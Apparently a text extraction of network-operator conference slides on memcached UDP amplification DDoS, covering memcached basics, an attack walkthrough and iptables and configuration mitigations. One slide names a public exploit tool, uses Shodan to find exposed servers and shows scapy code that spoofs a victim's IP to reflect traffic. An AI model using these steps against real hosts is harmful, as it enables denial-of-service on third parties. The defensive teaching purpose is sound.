Memcacheas UDP Reflectors: A Massive Amplified DDoSthe World(Attack Formulation and Mitigation) by
Muhammad Morshed Alam, AmberIT Limited.morshed@amberit.com.bd
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Memcache as udp traffic reflector
1. Memcache as UDP Reflectors: A Massive
Amplified DDoS the World
(Attack Formulation and Mitigation)
Presenter
Muhammad Morshed Alam
AmberIT Limited
morshed@amberit.com.bd
<Abror Netwroks> <Shodan Stats>
2. Outlines
• Memcache overview
• Memcache Variables and Commands
• Memcache DDoS Amplification Attack formulation,
Amplification Factor
• Memcache DDoS Tools (set and get requests, spoof UDP
packets)
• Mitigation (securing memcache servers using firewall
and SASL authentication)
3. Memcached Overview
• Free & open source, high-performance, distributed
memory object caching system
• Uses key-value to store arbitrary data (strings, objects)
• Set (key, Data) <= save the data in key
Get(key) => give the data from key
• add, delete and replace commands to strictly
insert/remove data in a key
• Optimizes backend database performance by
temporarily storing information in cache memory
6. Install Memcache Service Contd..
Verify open ports with the ss command or netstat
command:
# ss -tulpn | grep :11211
# netstat -tulpn | grep :11211
Configuration file:
# sudo vi /etc/memcached.conf
Service restart process:
# sudo systemctl restart memcached
7. Memcache Variables and Commands:
Connecting to the Memcache service:
root@bdnog-memcace:~# telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 12476
STAT uptime 20
STAT time 1524726956
STAT version 1.4.25 Ubuntu
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 0.008000
STAT rusage_system 0.004000
STAT curr_connections 1
STAT total_connections 2
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 0
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 7
STAT bytes_written 0
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT
time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END
8. Memcache-tools and outputs
# Setting data for a Key :
set key 0 3600 16
Welcome to BDNog
STORED
# Getting return the value of key:
get key
VALUE key 0 16
Welcome to BDNog
END
Using of libmemcached-tools command:
root@bdnog-memcace:~# memcstat --servers 127.0.0.1
Output: Give the present status of all memcache variables,
i.e.,
STAT cmd_get 1
STAT cmd_set 1
root@bdnog-memcace:~# memcdump --servers 127.0.0.1
Output: All available keys that holding the data of cache,
i.e.,
Key
root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
Output: return the value of that key, i.e.,
Welcome to BDNog
set <keyname> <some_flag> <expiration_in_millseconds> <length_of_data_to_follow>
9. Vulnerable Memcached Server
• No authentication required to access
• unauthorized inject big payload in cache
• Listen on unreliable UDP/Port 11211 from
any IP address
• UDP allows unreliable data delivery, Target
hosts receive data without prior consent
stats of vulnerable memcached
services available in internet (Qrator
Lab and Akamai)
10. 1. Finds a memcache vulnerable server listening at
UDP , port 11211 and high max size value of the
variable limit_maxbytes
2. Run a memcache SET command and fills 1 key to
it’s max size with data to ensure high payload
3. Sends multiple forged GET requests for that key
using continuous UDP and spoof victim IP
Attacker’s UDP Packets Contained:
•UDP GET key requests
•Size: 15B, SRC IP: spoof Target IP, DST
Port:11211, Des. IP: Memcahe Host
Vulnerable Memcached servers
exposed at Internet and listening
at UDP, Port: 11211
<Victims/Targets>
GET commands reflected to the victim IP with (key,
value)
Value of DATA is high, i.e, T. Size=(key, value)*# of
requests
GET Request 15B=> 750kB response, 50000x
amplification (Akamai Report)
SRC IP: Memcache host, DST IP: Target, SRC Port:
11211
Attack Formulation
11. 1. Attacker may user multiple vulnerable memcached servers
to a specific target IP by spoofing the SRC IP
2. Target network infra. overwhelmed with UDP Traffic
Memcache Amplification DDoS on bandwidth consumption
12. Trends of Protocols Used for Reflection
Most DDoS counted for Memcache (DDoSmon stats)
20. Memcached DDoS Tools
Sends forged UDP packets (Spoof the SRC IP/Target IP) to vulnerable
Memcached servers obtained using Shodan API
# git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
# apt-get install python3
# pip install shodan ;search engine
# pip install scapy ; require to manipulate UDP packets
Pass the API key collected from https://account.shodan.io/login and put the
target victim IP address to run the attack
# python3 Memcrashed.py
;x00injected is the key and some arbitary value in inserted to cache
setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn"
getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn")
;using scapy SRC IP manupluation and sending get request on behalf of
victim/Target IP
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
23. Step-1: Configuring The Firewall:
For TCP:
# /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
For UDP:
# /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Or permanently Disable for zimbra colaboration:
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Note: Save the iptables rules and check the rules
# iptables –L -v -n
Secure memcached server to avoid DDoS amplification attacks
24. Step-2: Changing the Configuration:
# sudo vim /etc/memcached.conf
-l 127.0.0.1,172.16.3.1 ;listening from localhost and
trusted block
-U 0 ;disable UDP 11211 listening
# sudo systemctl restart memcached
Secure memcached server to avoid DDoS amplification
attacks contd…